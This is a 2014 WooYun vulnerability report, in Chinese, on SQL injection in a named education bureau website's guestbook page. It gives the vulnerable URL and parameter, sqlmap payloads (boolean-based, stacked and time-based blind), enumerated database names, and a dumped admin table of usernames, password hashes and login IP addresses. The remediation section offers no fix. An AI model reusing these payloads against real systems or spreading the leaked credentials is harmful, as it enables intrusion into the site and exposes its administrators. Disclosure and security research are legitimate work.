漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-084031
漏洞标题:某教育局存在SQL注入导致该平台所以站点沦陷
相关厂商:CCERT教育网应急响应组
漏洞作者: 路人甲
提交时间:2014-11-21 12:01
修复时间:2014-11-26 12:02
公开时间:2014-11-26 12:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
无
详细说明:
问题站点:http://www.fjyajy.com/
它是一个教育局来负责帮该市搭建中学学生包括职高。具体网址如下
都存在一个站点目录下
漏洞证明:
SQL注入证明:
存在点:http://www.fjyajy.com/programs/guestbook/guestbook.asp?username=yasyxx
Payload:
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yasyxx' AND 7787=7787 AND 'hjrJ'='hjrJ
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=yasyxx'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=yasyxx' WAITFOR DELAY '0:0:5'--
---
[13:51:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2000
[13:51:57] [INFO] testing if current user is DBA
[13:51:57] [WARNING] reflective value(s) found and filtering out
current user is DBA: False
库:
available databases [9]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] TEACHING_Date
[*] tempdb
[*] YAJY_MultiUserRes
[*] YAJY_SCHOOL
数据包含太多了。我跑了好久都没跑完。。。。所以我就放弃跑了
其中一个裤子的表(未完全跑完被我暂停了。。)
Database: YAJY_SCHOOL
Table: Admin
[14 entries]
+----+---------+-----------+------------------+------------+-----------------+--------------------+----------------+-------------------+--------------------+--------------------+---------------------+----------------------+
| ID | Purview | UserName | Password | LoginTimes | LastLoginIP | LastLoginTime | LastLogoutTime | AdminPurview_Soft | AdminPurview_Photo | AdminPurview_Guest | AdminPurview_Others | AdminPurview_Article |
+----+---------+-----------+------------------+------------+-----------------+--------------------+----------------+-------------------+--------------------+--------------------+---------------------+----------------------+
| 11 | 2 | j__bgs_ | 6c9c62e867ef2e56 | NULL | 192.168.0.11 | 11 20 2014 8:23AM | NULL | NULL | NULL | <blank> | A9,A11$$C1,C3 | 2 |
| 13 | 2 | jyj_jcs | 14dcfac21130b453 | NULL | 10.0.36.124 | 07 7 2014 10:08AM | NULL | NULL | NULL | <blank> | A3,A9$$ | 3 |
| 14 | 1 | ya_lys | b83b5ca6ee584933 | NULL | 10.0.28.5 | 11 4 2008 2:00PM | NULL | 3 | 3 | <blank> | $$ | 3 |
| 15 | 2 | ya_zyd | 277d71b0bec00885 | NULL | 10.0.4.12 | 05 27 2013 6:16PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 16 | 2 | jyjzsb | 5f8f0aa579bf49fa | NULL | 192.168.0.11 | 11 19 2014 8:26AM | NULL | NULL | NULL | \x11 | $$ | 3 |
| 18 | 2 | jyjszk_dy | 0e1d871371877ccd | NULL | 192.168.0.11 | 07 9 2014 10:36AM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 19 | 2 | jyjghk | 6ba78a43ebeb781b | NULL | 10.0.36.133 | 07 26 2012 10:48AM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 20 | 2 | jyj_das | 08180323a2ccbe4f | NULL | 10.0.36.197 | 03 14 2013 2:21PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 22 | 2 | jyj__aqk_ | 37bc75a13a15d99c | NULL | 10.0.36.161 | 09 9 2014 4:35PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 23 | 2 | test | ec58e5c678f2e65a | NULL | 10.0.4.11 | 05 27 2013 5:52PM | NULL | NULL | NULL | <blank> | A3,A9,A11$$C1,C3 | 2 |
| 24 | 2 | lfs_ | 3777cdbe14b0377c | NULL | 125.79.181.62 | 10 10 2013 10:02PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 25 | 2 | jsjxxx | 2ffd47f898a99f75 | NULL | 220.162.227.242 | 11 19 2013 5:28PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 27 | 2 | jyjzzzx | 4367322eebd43e8e | NULL | 10.0.24.156 | 07 8 2014 5:11PM | NULL | NULL | NULL | <blank> | $$ | 3 |
| 4 | 1 | 3bca6ced6fdcce76 |
+----+---------+-----------+------------------+------------+-----------------+--------------------+----------------+-------------------+--------------------+--------------------+---------------------+----------------------+
修复方案:
你们比我专业
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-11-26 12:02
厂商回复:
最新状态:
暂无